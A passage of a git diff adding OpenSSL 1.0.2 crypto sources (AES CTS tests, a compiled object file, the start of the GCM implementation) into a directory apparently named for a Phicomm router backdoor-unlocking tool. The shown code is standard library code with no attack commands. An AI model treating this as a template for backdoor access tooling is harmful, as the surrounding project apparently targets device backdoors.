+    if (memcmp(iv, vector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(1);
+
+    /* test block-based decryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_cts128_decrypt_block(ciphertext, cleartext, len, &decks, iv,
+                                (block128_f) AES_decrypt);
+    if (memcmp(cleartext, test_input, len))
+        fprintf(stderr, "input_%d mismatch\n", len), exit(2);
+    if (memcmp(iv, vector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(2);
+
+    /* test streamed encryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_cts128_encrypt(test_input, ciphertext, len, &encks, iv,
+                          (cbc128_f) AES_cbc_encrypt);
+    if (memcmp(ciphertext, vector, len))
+        fprintf(stderr, "output_%d mismatch\n", len), exit(3);
+    if (memcmp(iv, vector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(3);
+
+    /* test streamed decryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_cts128_decrypt(ciphertext, cleartext, len, &decks, iv,
+                          (cbc128_f) AES_cbc_encrypt);
+    if (memcmp(cleartext, test_input, len))
+        fprintf(stderr, "input_%d mismatch\n", len), exit(4);
+    if (memcmp(iv, vector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(4);
+}
+
+void test_nistvector(const unsigned char *vector, size_t len)
+{
+    unsigned char iv[sizeof(test_iv)];
+    unsigned char cleartext[64], ciphertext[64], nistvector[64];
+    size_t tail;
+
+    printf("nistvector_%d\n", len);
+    fflush(stdout);
+
+    if ((tail = len % 16) == 0)
+        tail = 16;
+
+    len -= 16 + tail;
+    memcpy(nistvector, vector, len);
+    /* flip two last blocks */
+    memcpy(nistvector + len, vector + len + 16, tail);
+    memcpy(nistvector + len + tail, vector + len, 16);
+    len += 16 + tail;
+    tail = 16;
+
+    /* test block-based encryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_nistcts128_encrypt_block(test_input, ciphertext, len, &encks, iv,
+                                    (block128_f) AES_encrypt);
+    if (memcmp(ciphertext, nistvector, len))
+        fprintf(stderr, "output_%d mismatch\n", len), exit(1);
+    if (memcmp(iv, nistvector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(1);
+
+    /* test block-based decryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_nistcts128_decrypt_block(ciphertext, cleartext, len, &decks, iv,
+                                    (block128_f) AES_decrypt);
+    if (memcmp(cleartext, test_input, len))
+        fprintf(stderr, "input_%d mismatch\n", len), exit(2);
+    if (memcmp(iv, nistvector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(2);
+
+    /* test streamed encryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_nistcts128_encrypt(test_input, ciphertext, len, &encks, iv,
+                              (cbc128_f) AES_cbc_encrypt);
+    if (memcmp(ciphertext, nistvector, len))
+        fprintf(stderr, "output_%d mismatch\n", len), exit(3);
+    if (memcmp(iv, nistvector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(3);
+
+    /* test streamed decryption */
+    memcpy(iv, test_iv, sizeof(test_iv));
+    CRYPTO_nistcts128_decrypt(ciphertext, cleartext, len, &decks, iv,
+                              (cbc128_f) AES_cbc_encrypt);
+    if (memcmp(cleartext, test_input, len))
+        fprintf(stderr, "input_%d mismatch\n", len), exit(4);
+    if (memcmp(iv, nistvector + len - tail, sizeof(iv)))
+        fprintf(stderr, "iv_%d mismatch\n", len), exit(4);
+}
+
+int main()
+{
+    AES_set_encrypt_key(test_key, 128, &encks);
+    AES_set_decrypt_key(test_key, 128, &decks);
+
+    test_vector(vector_17, sizeof(vector_17));
+    test_vector(vector_31, sizeof(vector_31));
+    test_vector(vector_32, sizeof(vector_32));
+    test_vector(vector_47, sizeof(vector_47));
+    test_vector(vector_48, sizeof(vector_48));
+    test_vector(vector_64, sizeof(vector_64));
+
+    test_nistvector(vector_17, sizeof(vector_17));
+    test_nistvector(vector_31, sizeof(vector_31));
+    test_nistvector(vector_32, sizeof(vector_32));
+    test_nistvector(vector_47, sizeof(vector_47));
+    test_nistvector(vector_48, sizeof(vector_48));
+    test_nistvector(vector_64, sizeof(vector_64));
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cts128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cts128.o
new file mode 100644
index 0000000000000000000000000000000000000000..3acfabf3ddec6f57182c6321d8b01172c5f87dcd
GIT binary patch
literal 4856
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
C3P;lb

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/gcm128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/gcm128.c
new file mode 100644
index 0000000..4debf53
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/gcm128.c
@@ -0,0 +1,2363 @@
+/* ====================================================================
+ * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#define OPENSSL_FIPSAPI
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#if defined(BSWAP4) && defined(STRICT_ALIGNMENT)
+/* redefine, because alignment is ensured */
+# undef  GETU32
+# define GETU32(p)       BSWAP4(*(const u32 *)(p))
+# undef  PUTU32
+# define PUTU32(p,v)     *(u32 *)(p) = BSWAP4(v)
+#endif
+
+#define PACK(s)         ((size_t)(s)<<(sizeof(size_t)*8-16))
+#define REDUCE1BIT(V)   do { \
+        if (sizeof(size_t)==8) { \
+                u64 T = U64(0xe100000000000000) & (0-(V.lo&1)); \
+                V.lo  = (V.hi<<63)|(V.lo>>1); \
+                V.hi  = (V.hi>>1 )^T; \
+        } \
+        else { \
+                u32 T = 0xe1000000U & (0-(u32)(V.lo&1)); \
+                V.lo  = (V.hi<<63)|(V.lo>>1); \
+                V.hi  = (V.hi>>1 )^((u64)T<<32); \
+        } \
+} while(0)
+
+/*-
+ * Even though permitted values for TABLE_BITS are 8, 4 and 1, it should
+ * never be set to 8. 8 is effectively reserved for testing purposes.
+ * TABLE_BITS>1 are lookup-table-driven implementations referred to as
+ * "Shoup's" in GCM specification. In other words OpenSSL does not cover
+ * whole spectrum of possible table driven implementations. Why? In
+ * non-"Shoup's" case memory access pattern is segmented in such manner,
+ * that it's trivial to see that cache timing information can reveal
+ * fair portion of intermediate hash value. Given that ciphertext is
+ * always available to attacker, it's possible for him to attempt to
+ * deduce secret parameter H and if successful, tamper with messages
+ * [which is nothing but trivial in CTR mode]. In "Shoup's" case it's
+ * not as trivial, but there is no reason to believe that it's resistant
+ * to cache-timing attack. And the thing about "8-bit" implementation is
+ * that it consumes 16 (sixteen) times more memory, 4KB per individual
+ * key + 1KB shared. Well, on pros side it should be twice as fast as
+ * "4-bit" version. And for gcc-generated x86[_64] code, "8-bit" version
+ * was observed to run ~75% faster, closer to 100% for commercial
+ * compilers... Yet "4-bit" procedure is preferred, because it's
+ * believed to provide better security-performance balance and adequate
+ * all-round performance. "All-round" refers to things like:
+ *
+ * - shorter setup time effectively improves overall timing for
+ *   handling short messages;
+ * - larger table allocation can become unbearable because of VM
+ *   subsystem penalties (for example on Windows large enough free
+ *   results in VM working set trimming, meaning that consequent
+ *   malloc would immediately incur working set expansion);
+ * - larger table has larger cache footprint, which can affect
+ *   performance of other code paths (not necessarily even from same
+ *   thread in Hyper-Threading world);
+ *
+ * Value of 1 is not appropriate for performance reasons.
+ */
+#if     TABLE_BITS==8
+
+static void gcm_init_8bit(u128 Htable[256], u64 H[2])
+{
+    int i, j;
+    u128 V;
+
+    Htable[0].hi = 0;
+    Htable[0].lo = 0;
+    V.hi = H[0];
+    V.lo = H[1];
+
+    for (Htable[128] = V, i = 64; i > 0; i >>= 1) {
+        REDUCE1BIT(V);
+        Htable[i] = V;
+    }
+
+    for (i = 2; i < 256; i <<= 1) {
+        u128 *Hi = Htable + i, H0 = *Hi;
+        for (j = 1; j < i; ++j) {
+            Hi[j].hi = H0.hi ^ Htable[j].hi;
+            Hi[j].lo = H0.lo ^ Htable[j].lo;
+        }
+    }
+}
+
+static void gcm_gmult_8bit(u64 Xi[2], const u128 Htable[256])
+{
+    u128 Z = { 0, 0 };
+    const u8 *xi = (const u8 *)Xi + 15;
+    size_t rem, n = *xi;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    static const size_t rem_8bit[256] = {
+        PACK(0x0000), PACK(0x01C2), PACK(0x0384), PACK(0x0246),
+        PACK(0x0708), PACK(0x06CA), PACK(0x048C), PACK(0x054E),
+        PACK(0x0E10), PACK(0x0FD2), PACK(0x0D94), PACK(0x0C56),
+        PACK(0x0918), PACK(0x08DA), PACK(0x0A9C), PACK(0x0B5E),
+        PACK(0x1C20), PACK(0x1DE2), PACK(0x1FA4), PACK(0x1E66),
+        PACK(0x1B28), PACK(0x1AEA), PACK(0x18AC), PACK(0x196E),
+        PACK(0x1230), PACK(0x13F2), PACK(0x11B4), PACK(0x1076),
+        PACK(0x1538), PACK(0x14FA), PACK(0x16BC), PACK(0x177E),
+        PACK(0x3840), PACK(0x3982), PACK(0x3BC4), PACK(0x3A06),
+        PACK(0x3F48), PACK(0x3E8A), PACK(0x3CCC), PACK(0x3D0E),
+        PACK(0x3650), PACK(0x3792), PACK(0x35D4), PACK(0x3416),
+        PACK(0x3158), PACK(0x309A), PACK(0x32DC), PACK(0x331E),
+        PACK(0x2460), PACK(0x25A2), PACK(0x27E4), PACK(0x2626),
+        PACK(0x2368), PACK(0x22AA), PACK(0x20EC), PACK(0x212E),
+        PACK(0x2A70), PACK(0x2BB2), PACK(0x29F4), PACK(0x2836),
+        PACK(0x2D78), PACK(0x2CBA), PACK(0x2EFC), PACK(0x2F3E),
+        PACK(0x7080), PACK(0x7142), PACK(0x7304), PACK(0x72C6),
+        PACK(0x7788), PACK(0x764A), PACK(0x740C), PACK(0x75CE),
+        PACK(0x7E90), PACK(0x7F52), PACK(0x7D14), PACK(0x7CD6),
+        PACK(0x7998), PACK(0x785A), PACK(0x7A1C), PACK(0x7BDE),
+        PACK(0x6CA0), PACK(0x6D62), PACK(0x6F24), PACK(0x6EE6),
+        PACK(0x6BA8), PACK(0x6A6A), PACK(0x682C), PACK(0x69EE),
+        PACK(0x62B0), PACK(0x6372), PACK(0x6134), PACK(0x60F6),
+        PACK(0x65B8), PACK(0x647A), PACK(0x663C), PACK(0x67FE),
+        PACK(0x48C0), PACK(0x4902), PACK(0x4B44), PACK(0x4A86),
+        PACK(0x4FC8), PACK(0x4E0A), PACK(0x4C4C), PACK(0x4D8E),
+        PACK(0x46D0), PACK(0x4712), PACK(0x4554), PACK(0x4496),
+        PACK(0x41D8), PACK(0x401A), PACK(0x425C), PACK(0x439E),
+        PACK(0x54E0), PACK(0x5522), PACK(0x5764), PACK(0x56A6),
+        PACK(0x53E8), PACK(0x522A), PACK(0x506C), PACK(0x51AE),
+        PACK(0x5AF0), PACK(0x5B32), PACK(0x5974), PACK(0x58B6),
+        PACK(0x5DF8), PACK(0x5C3A), PACK(0x5E7C), PACK(0x5FBE),
+        PACK(0xE100), PACK(0xE0C2), PACK(0xE284), PACK(0xE346),
+        PACK(0xE608), PACK(0xE7CA), PACK(0xE58C), PACK(0xE44E),
+        PACK(0xEF10), PACK(0xEED2), PACK(0xEC94), PACK(0xED56),
+        PACK(0xE818), PACK(0xE9DA), PACK(0xEB9C), PACK(0xEA5E),
+        PACK(0xFD20), PACK(0xFCE2), PACK(0xFEA4), PACK(0xFF66),
+        PACK(0xFA28), PACK(0xFBEA), PACK(0xF9AC), PACK(0xF86E),
+        PACK(0xF330), PACK(0xF2F2), PACK(0xF0B4), PACK(0xF176),
+        PACK(0xF438), PACK(0xF5FA), PACK(0xF7BC), PACK(0xF67E),
+        PACK(0xD940), PACK(0xD882), PACK(0xDAC4), PACK(0xDB06),
+        PACK(0xDE48), PACK(0xDF8A), PACK(0xDDCC), PACK(0xDC0E),
+        PACK(0xD750), PACK(0xD692), PACK(0xD4D4), PACK(0xD516),
+        PACK(0xD058), PACK(0xD19A), PACK(0xD3DC), PACK(0xD21E),
+        PACK(0xC560), PACK(0xC4A2), PACK(0xC6E4), PACK(0xC726),
+        PACK(0xC268), PACK(0xC3AA), PACK(0xC1EC), PACK(0xC02E),
+        PACK(0xCB70), PACK(0xCAB2), PACK(0xC8F4), PACK(0xC936),
+        PACK(0xCC78), PACK(0xCDBA), PACK(0xCFFC), PACK(0xCE3E),
+        PACK(0x9180), PACK(0x9042), PACK(0x9204), PACK(0x93C6),
+        PACK(0x9688), PACK(0x974A), PACK(0x950C), PACK(0x94CE),
+        PACK(0x9F90), PACK(0x9E52), PACK(0x9C14), PACK(0x9DD6),
+        PACK(0x9898), PACK(0x995A), PACK(0x9B1C), PACK(0x9ADE),
+        PACK(0x8DA0), PACK(0x8C62), PACK(0x8E24), PACK(0x8FE6),
+        PACK(0x8AA8), PACK(0x8B6A), PACK(0x892C), PACK(0x88EE),
+        PACK(0x83B0), PACK(0x8272), PACK(0x8034), PACK(0x81F6),
+        PACK(0x84B8), PACK(0x857A), PACK(0x873C), PACK(0x86FE),
+        PACK(0xA9C0), PACK(0xA802), PACK(0xAA44), PACK(0xAB86),
+        PACK(0xAEC8), PACK(0xAF0A), PACK(0xAD4C), PACK(0xAC8E),
+        PACK(0xA7D0), PACK(0xA612), PACK(0xA454), PACK(0xA596),
+        PACK(0xA0D8), PACK(0xA11A), PACK(0xA35C), PACK(0xA29E),
+        PACK(0xB5E0), PACK(0xB422), PACK(0xB664), PACK(0xB7A6),
+        PACK(0xB2E8), PACK(0xB32A), PACK(0xB16C), PACK(0xB0AE),
+        PACK(0xBBF0), PACK(0xBA32), PACK(0xB874), PACK(0xB9B6),
+        PACK(0xBCF8), PACK(0xBD3A), PACK(0xBF7C), PACK(0xBEBE)
+    };
+
+    while (1) {
+        Z.hi ^= Htable[n].hi;
+        Z.lo ^= Htable[n].lo;
+
+        if ((u8 *)Xi == xi)
+            break;
+
+        n = *(--xi);
+
+        rem = (size_t)Z.lo & 0xff;
+        Z.lo = (Z.hi << 56) | (Z.lo >> 8);
+        Z.hi = (Z.hi >> 8);
+        if (sizeof(size_t) == 8)
+            Z.hi ^= rem_8bit[rem];
+        else
+            Z.hi ^= (u64)rem_8bit[rem] << 32;
+    }
+
+    if (is_endian.little) {
+# ifdef BSWAP8
+        Xi[0] = BSWAP8(Z.hi);
+        Xi[1] = BSWAP8(Z.lo);
+# else
+        u8 *p = (u8 *)Xi;
+        u32 v;
+        v = (u32)(Z.hi >> 32);
+        PUTU32(p, v);
+        v = (u32)(Z.hi);
+        PUTU32(p + 4, v);
+        v = (u32)(Z.lo >> 32);
+        PUTU32(p + 8, v);
+        v = (u32)(Z.lo);
+        PUTU32(p + 12, v);
+# endif
+    } else {
+        Xi[0] = Z.hi;
+        Xi[1] = Z.lo;
+    }
+}
+
+# define GCM_MUL(ctx,Xi)   gcm_gmult_8bit(ctx->Xi.u,ctx->Htable)
+
+#elif   TABLE_BITS==4
+
+static void gcm_init_4bit(u128 Htable[16], u64 H[2])
+{
+    u128 V;
+# if defined(OPENSSL_SMALL_FOOTPRINT)
+    int i;
+# endif
+
+    Htable[0].hi = 0;
+    Htable[0].lo = 0;
+    V.hi = H[0];
+    V.lo = H[1];
+
+# if defined(OPENSSL_SMALL_FOOTPRINT)
+    for (Htable[8] = V, i = 4; i > 0; i >>= 1) {
+        REDUCE1BIT(V);
+        Htable[i] = V;
+    }
+
+    for (i = 2; i < 16; i <<= 1) {
+        u128 *Hi = Htable + i;
+        int j;
+        for (V = *Hi, j = 1; j < i; ++j) {
+            Hi[j].hi = V.hi ^ Htable[j].hi;
+            Hi[j].lo = V.lo ^ Htable[j].lo;
+        }
+    }
+# else
+    Htable[8] = V;
+    REDUCE1BIT(V);
+    Htable[4] = V;
+    REDUCE1BIT(V);
+    Htable[2] = V;
+    REDUCE1BIT(V);
+    Htable[1] = V;
+    Htable[3].hi = V.hi ^ Htable[2].hi, Htable[3].lo = V.lo ^ Htable[2].lo;
+    V = Htable[4];
+    Htable[5].hi = V.hi ^ Htable[1].hi, Htable[5].lo = V.lo ^ Htable[1].lo;
+    Htable[6].hi = V.hi ^ Htable[2].hi, Htable[6].lo = V.lo ^ Htable[2].lo;
+    Htable[7].hi = V.hi ^ Htable[3].hi, Htable[7].lo = V.lo ^ Htable[3].lo;
+    V = Htable[8];
+    Htable[9].hi = V.hi ^ Htable[1].hi, Htable[9].lo = V.lo ^ Htable[1].lo;
+    Htable[10].hi = V.hi ^ Htable[2].hi, Htable[10].lo = V.lo ^ Htable[2].lo;
+    Htable[11].hi = V.hi ^ Htable[3].hi, Htable[11].lo = V.lo ^ Htable[3].lo;
+    Htable[12].hi = V.hi ^ Htable[4].hi, Htable[12].lo = V.lo ^ Htable[4].lo;
+    Htable[13].hi = V.hi ^ Htable[5].hi, Htable[13].lo = V.lo ^ Htable[5].lo;
+    Htable[14].hi = V.hi ^ Htable[6].hi, Htable[14].lo = V.lo ^ Htable[6].lo;
+    Htable[15].hi = V.hi ^ Htable[7].hi, Htable[15].lo = V.lo ^ Htable[7].lo;
+# endif
+# if defined(GHASH_ASM) && (defined(__arm__) || defined(__arm))
+    /*
+     * ARM assembler expects specific dword order in Htable.
+     */
+    {
+        int j;
+        const union {
+            long one;
+            char little;
+        } is_endian = {
+            1
+        };
+
+        if (is_endian.little)
+            for (j = 0; j < 16; ++j) {
+                V = Htable[j];
+                Htable[j].hi = V.lo;
+                Htable[j].lo = V.hi;
+        } else
+            for (j = 0; j < 16; ++j) {
+                V = Htable[j];
+                Htable[j].hi = V.lo << 32 | V.lo >> 32;
+                Htable[j].lo = V.hi << 32 | V.hi >> 32;
+            }
+    }
+# endif
+}
+
+# ifndef GHASH_ASM
+static const size_t rem_4bit[16] = {
+    PACK(0x0000), PACK(0x1C20), PACK(0x3840), PACK(0x2460),
+    PACK(0x7080), PACK(0x6CA0), PACK(0x48C0), PACK(0x54E0),
+    PACK(0xE100), PACK(0xFD20), PACK(0xD940), PACK(0xC560),
+    PACK(0x9180), PACK(0x8DA0), PACK(0xA9C0), PACK(0xB5E0)
+};
+
+static void gcm_gmult_4bit(u64 Xi[2], const u128 Htable[16])
+{
+    u128 Z;
+    int cnt = 15;
+    size_t rem, nlo, nhi;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    nlo = ((const u8 *)Xi)[15];
+    nhi = nlo >> 4;
+    nlo &= 0xf;
+
+    Z.hi = Htable[nlo].hi;
+    Z.lo = Htable[nlo].lo;
+
+    while (1) {
+        rem = (size_t)Z.lo & 0xf;
+        Z.lo = (Z.hi << 60) | (Z.lo >> 4);
+        Z.hi = (Z.hi >> 4);
+        if (sizeof(size_t) == 8)
+            Z.hi ^= rem_4bit[rem];
+        else
+            Z.hi ^= (u64)rem_4bit[rem] << 32;
+
+        Z.hi ^= Htable[nhi].hi;
+        Z.lo ^= Htable[nhi].lo;
+
+        if (--cnt < 0)
+            break;
+
+        nlo = ((const u8 *)Xi)[cnt];
+        nhi = nlo >> 4;
+        nlo &= 0xf;
+
+        rem = (size_t)Z.lo & 0xf;
+        Z.lo = (Z.hi << 60) | (Z.lo >> 4);
+        Z.hi = (Z.hi >> 4);
+        if (sizeof(size_t) == 8)
+            Z.hi ^= rem_4bit[rem];
+        else
+            Z.hi ^= (u64)rem_4bit[rem] << 32;
+
+        Z.hi ^= Htable[nlo].hi;
+        Z.lo ^= Htable[nlo].lo;
+    }
+
+    if (is_endian.little) {
+#  ifdef BSWAP8
+        Xi[0] = BSWAP8(Z.hi);
+        Xi[1] = BSWAP8(Z.lo);
+#  else
+        u8 *p = (u8 *)Xi;
+        u32 v;
+        v = (u32)(Z.hi >> 32);
+        PUTU32(p, v);
+        v = (u32)(Z.hi);
+        PUTU32(p + 4, v);
+        v = (u32)(Z.lo >> 32);
+        PUTU32(p + 8, v);
+        v = (u32)(Z.lo);
+        PUTU32(p + 12, v);
+#  endif
+    } else {
+        Xi[0] = Z.hi;
+        Xi[1] = Z.lo;
+    }
+}
+
+#  if !defined(OPENSSL_SMALL_FOOTPRINT)
+/*
+ * Streamed gcm_mult_4bit, see CRYPTO_gcm128_[en|de]crypt for
+ * details... Compiler-generated code doesn't seem to give any
+ * performance improvement, at least not on x86[_64]. It's here
+ * mostly as reference and a placeholder for possible future
+ * non-trivial optimization[s]...
+ */
+static void gcm_ghash_4bit(u64 Xi[2], const u128 Htable[16],
+                           const u8 *inp, size_t len)
+{
+    u128 Z;
+    int cnt;
+    size_t rem, nlo, nhi;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+#   if 1
+    do {
+        cnt = 15;
+        nlo = ((const u8 *)Xi)[15];
+        nlo ^= inp[15];
+        nhi = nlo >> 4;
+        nlo &= 0xf;
+
+        Z.hi = Htable[nlo].hi;
+        Z.lo = Htable[nlo].lo;
+
+        while (1) {
+            rem = (size_t)Z.lo & 0xf;
+            Z.lo = (Z.hi << 60) | (Z.lo >> 4);
+            Z.hi = (Z.hi >> 4);
+            if (sizeof(size_t) == 8)
+                Z.hi ^= rem_4bit[rem];
+            else
+                Z.hi ^= (u64)rem_4bit[rem] << 32;
+
+            Z.hi ^= Htable[nhi].hi;
+            Z.lo ^= Htable[nhi].lo;
+
+            if (--cnt < 0)
+                break;
+
+            nlo = ((const u8 *)Xi)[cnt];
+            nlo ^= inp[cnt];
+            nhi = nlo >> 4;
+            nlo &= 0xf;
+
+            rem = (size_t)Z.lo & 0xf;
+            Z.lo = (Z.hi << 60) | (Z.lo >> 4);
+            Z.hi = (Z.hi >> 4);
+            if (sizeof(size_t) == 8)
+                Z.hi ^= rem_4bit[rem];
+            else
+                Z.hi ^= (u64)rem_4bit[rem] << 32;
+
+            Z.hi ^= Htable[nlo].hi;
